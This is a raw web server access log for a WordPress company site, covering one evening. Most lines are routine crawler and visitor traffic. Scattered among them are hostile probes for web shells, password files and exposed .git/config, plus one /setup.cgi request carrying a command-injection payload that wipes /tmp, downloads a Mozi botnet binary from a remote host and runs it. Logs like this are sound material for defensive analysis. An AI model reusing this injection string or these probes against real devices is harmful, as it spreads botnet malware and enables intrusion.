85.208.96.212 - - [01/Jan/2026:16:32:27 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [01/Jan/2026:16:32:28 +0800] "GET /policy/ HTTP/1.1" 200 23839 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.167.144.149 - - [01/Jan/2026:16:34:15 +0800] "GET /news/ HTTP/1.1" 200 20052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:16:39:24 +0800] "POST /wp-cron.php?doing_wp_cron=1767256764.2835779190063476562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
107.170.25.223 - - [01/Jan/2026:16:39:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.25.223 - - [01/Jan/2026:16:39:25 +0800] "GET / HTTP/1.1" 200 34110 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.25.223 - - [01/Jan/2026:16:39:26 +0800] "GET /form.html HTTP/1.1" 404 8981 "-" "curl/8.1.2"
107.170.25.223 - - [01/Jan/2026:16:39:27 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
107.170.25.223 - - [01/Jan/2026:16:39:28 +0800] "GET /t4 HTTP/1.1" 404 8981 "-" "Mozilla/5.0"
107.170.25.223 - - [01/Jan/2026:16:39:30 +0800] "GET /geoip/ HTTP/1.1" 404 8981 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.25.223 - - [01/Jan/2026:16:39:31 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.25.223 - - [01/Jan/2026:16:39:32 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.25.223 - - [01/Jan/2026:16:39:32 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:16:43:05 +0800] "POST /wp-cron.php?doing_wp_cron=1767256985.5398380756378173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.166.247.82 - - [01/Jan/2026:16:43:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.247.82 - - [01/Jan/2026:16:43:08 +0800] "GET / HTTP/1.1" 200 33679 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [01/Jan/2026:16:52:35 +0800] "POST /wp-cron.php?doing_wp_cron=1767257555.0811591148376464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
116.207.207.234 - - [01/Jan/2026:16:52:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 9.5; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1984.88 Safari/537.36"
116.207.207.234 - - [01/Jan/2026:16:52:35 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 (Windows NT 9.5; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1984.88 Safari/537.36"
116.207.207.234 - - [01/Jan/2026:16:52:35 +0800] "GET /contacts/ HTTP/1.1" 200 21595 "-" "Mozilla/5.0 (Windows NT 9.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1891.88 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:16:54:15 +0800] "POST /wp-cron.php?doing_wp_cron=1767257655.7793209552764892578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
116.207.207.234 - - [01/Jan/2026:16:54:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.8; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2658.88 Safari/537.36"
116.207.207.234 - - [01/Jan/2026:16:54:15 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 (Windows NT 5.8; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2658.88 Safari/537.36"
116.207.207.234 - - [01/Jan/2026:16:54:15 +0800] "GET /contacts/ HTTP/1.1" 200 21595 "-" "Mozilla/5.0 (Windows NT 7.4; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.1135.88 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:17:00:50 +0800] "POST /wp-cron.php?doing_wp_cron=1767258050.1342210769653320312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
117.217.17.203 - - [01/Jan/2026:17:00:50 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.217.17.203:41349/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31351 "-" "-"
36.133.115.36 - - [01/Jan/2026:17:03:56 +0800] "POST /wp-cron.php?doing_wp_cron=1767258236.9442141056060791015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [01/Jan/2026:17:03:57 +0800] "GET / HTTP/1.1" 200 33679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [01/Jan/2026:17:09:27 +0800] "POST /wp-cron.php?doing_wp_cron=1767258567.4485669136047363281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
84.247.191.234 - - [01/Jan/2026:17:09:27 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
52.167.144.171 - - [01/Jan/2026:17:10:55 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:17:27:35 +0800] "POST /wp-cron.php?doing_wp_cron=1767259655.1921770572662353515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
195.178.110.18 - - [01/Jan/2026:17:27:35 +0800] "GET /.git/config HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
195.178.110.18 - - [01/Jan/2026:17:27:35 +0800] "GET /.git/config HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [01/Jan/2026:17:58:59 +0800] "POST /wp-cron.php?doing_wp_cron=1767261539.4616730213165283203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [01/Jan/2026:17:58:59 +0800] "GET / HTTP/1.1" 200 33679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [01/Jan/2026:18:00:47 +0800] "POST /wp-cron.php?doing_wp_cron=1767261647.7076001167297363281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.247.137.207 - - [01/Jan/2026:18:00:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
185.247.137.207 - - [01/Jan/2026:18:00:48 +0800] "GET / HTTP/1.1" 200 34110 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [01/Jan/2026:18:02:40 +0800] "POST /wp-cron.php?doing_wp_cron=1767261760.0220251083374023437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
188.130.26.65 - - [01/Jan/2026:18:02:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0"
36.133.115.36 - - [01/Jan/2026:18:22:41 +0800] "POST /wp-cron.php?doing_wp_cron=1767262961.1925210952758789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [01/Jan/2026:18:22:42 +0800] "POST / HTTP/1.1" 200 33679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
14.108.234.20 - - [01/Jan/2026:18:37:17 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:17 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1765890155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled.webp HTTP/1.1" 200 152162 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:18 +0800] "GET /wp-content/uploads/2025/12/1765265398-qizhou_Slider_3840%C3%972160_20251209-scaled-50x100.webp HTTP/1.1" 200 2166 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [01/Jan/2026:18:37:19 +0800] "POST /wp-cron.php?doing_wp_cron=1767263839.6255540847778320312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [01/Jan/2026:18:37:19 +0800] "POST /wp-cron.php?doing_wp_cron=1767263839.6259050369262695312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
14.108.234.20 - - [01/Jan/2026:18:37:19 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:19 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2286 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:19 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:19 +0800] "GET /wp-content/uploads/2025/12/1765265398-qizhou_Slider_3840%C3%972160_20251209-scaled.webp HTTP/1.1" 200 175208 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:20 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1765890155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:20 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.234.20 - - [01/Jan/2026:18:37:20 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
40.77.167.18 - - [01/Jan/2026:18:45:51 +0800] "GET /about/ HTTP/1.1" 200 29976 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:18:50:50 +0800] "POST /wp-cron.php?doing_wp_cron=1767264650.0821919441223144531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [01/Jan/2026:18:50:50 +0800] "GET / HTTP/1.1" 200 33679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.68.64 - - [01/Jan/2026:18:55:20 +0800] "GET /wp-content/uploads/2025/11/1762864379-QZ_Photo-6.webp HTTP/1.1" 200 121336 "-" "Googlebot-Image/1.0"
36.133.115.36 - - [01/Jan/2026:19:04:30 +0800] "POST /wp-cron.php?doing_wp_cron=1767265470.1376550197601318359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
198.244.242.185 - - [01/Jan/2026:19:04:30 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
92.222.108.116 - - [01/Jan/2026:19:04:34 +0800] "GET /news/page/1/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
91.224.92.121 - - [01/Jan/2026:19:05:44 +0800] "OPTIONS / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:19:05:58 +0800] "POST /wp-cron.php?doing_wp_cron=1767265558.4349648952484130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
89.42.231.239 - - [01/Jan/2026:19:05:58 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.138.99.180 - - [01/Jan/2026:19:09:49 +0800] "GET / HTTP/1.0" 200 153956 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
78.138.99.180 - - [01/Jan/2026:19:09:52 +0800] "GET /contacts/ HTTP/1.0" 200 76700 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:19:09:54 +0800] "POST /wp-cron.php?doing_wp_cron=1767265794.2746710777282714843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
78.138.99.180 - - [01/Jan/2026:19:09:55 +0800] "POST /contacts/ HTTP/1.0" 200 69835 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:19:20:30 +0800] "POST /wp-cron.php?doing_wp_cron=1767266430.6475439071655273437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.159.152.184 - - [01/Jan/2026:19:20:30 +0800] "GET / HTTP/1.1" 200 33679 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [01/Jan/2026:19:40:03 +0800] "POST /wp-cron.php?doing_wp_cron=1767267603.8099660873413085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
74.7.227.147 - - [01/Jan/2026:19:40:03 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.41 - - [01/Jan/2026:19:40:04 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
36.133.115.36 - - [01/Jan/2026:19:49:56 +0800] "POST /wp-cron.php?doing_wp_cron=1767268196.7238440513610839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [01/Jan/2026:19:49:56 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [01/Jan/2026:19:49:57 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34110 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [01/Jan/2026:20:10:01 +0800] "POST /wp-cron.php?doing_wp_cron=1767269401.5588901042938232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [01/Jan/2026:20:10:01 +0800] "HEAD /menu.cgi HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:20:12:53 +0800] "POST /wp-cron.php?doing_wp_cron=1767269573.5933969020843505859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
82.165.19.236 - - [01/Jan/2026:20:12:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0"
36.133.115.36 - - [01/Jan/2026:20:26:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767270364.4660289287567138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.32.245 - - [01/Jan/2026:20:26:04 +0800] "GET / HTTP/1.1" 200 33677 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [01/Jan/2026:20:29:14 +0800] "POST /wp-cron.php?doing_wp_cron=1767270554.0936360359191894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
17.241.75.243 - - [01/Jan/2026:20:29:14 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.243 - - [01/Jan/2026:20:29:14 +0800] "GET /2388/ HTTP/1.1" 200 20778 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
36.133.115.36 - - [01/Jan/2026:20:30:39 +0800] "POST /wp-cron.php?doing_wp_cron=1767270639.5224759578704833984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
143.198.146.193 - - [01/Jan/2026:20:30:39 +0800] "GET /.git/config HTTP/1.1" 404 8974 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [01/Jan/2026:20:31:12 +0800] "POST /wp-cron.php?doing_wp_cron=1767270671.9275860786437988281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
147.135.212.217 - - [01/Jan/2026:20:31:12 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.212.217 - - [01/Jan/2026:20:31:14 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 200 22871 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.212.217 - - [01/Jan/2026:20:31:17 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22115 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.212.217 - - [01/Jan/2026:20:31:20 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22137 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [01/Jan/2026:20:38:05 +0800] "POST /wp-cron.php?doing_wp_cron=1767271085.3154039382934570312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [01/Jan/2026:20:38:05 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [01/Jan/2026:20:45:20 +0800] "POST /wp-cron.php?doing_wp_cron=1767271520.9166629314422607421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
60.188.57.0 - - [01/Jan/2026:20:45:21 +0800] "GET / HTTP/1.1" 200 33677 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [01/Jan/2026:20:49:03 +0800] "POST /wp-cron.php?doing_wp_cron=1767271743.6621448993682861328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
167.94.138.184 - - [01/Jan/2026:20:49:03 +0800] "GET /security.txt HTTP/1.1" 200 19708 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
85.214.84.94 - - [01/Jan/2026:20:49:39 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
36.133.115.36 - - [01/Jan/2026:20:55:49 +0800] "POST /wp-cron.php?doing_wp_cron=1767272149.7849469184875488281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
182.141.248.28 - - [01/Jan/2026:20:55:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
182.141.248.28 - - [01/Jan/2026:20:55:50 +0800] "GET / HTTP/1.1" 200 34110 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
182.141.248.28 - - [01/Jan/2026:20:56:01 +0800] "GET /login.rsp HTTP/1.1" 404 8980 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
157.55.39.58 - - [01/Jan/2026:21:20:02 +0800] "GET /wp-content/uploads/2025/12/1766647832-Article_images_W900%C3%97500px20251225.webp HTTP/1.1" 200 44582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.44 - - [01/Jan/2026:21:20:05 +0800] "GET /wp-content/uploads/2025/12/1766064629-Article_images_20251218212623.webp HTTP/1.1" 200 20366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.192 - - [01/Jan/2026:21:20:07 +0800] "GET /wp-content/uploads/2025/12/1765891413-20251209103501.webp HTTP/1.1" 200 24878 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:21:32:59 +0800] "POST /wp-cron.php?doing_wp_cron=1767274379.3677639961242675781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
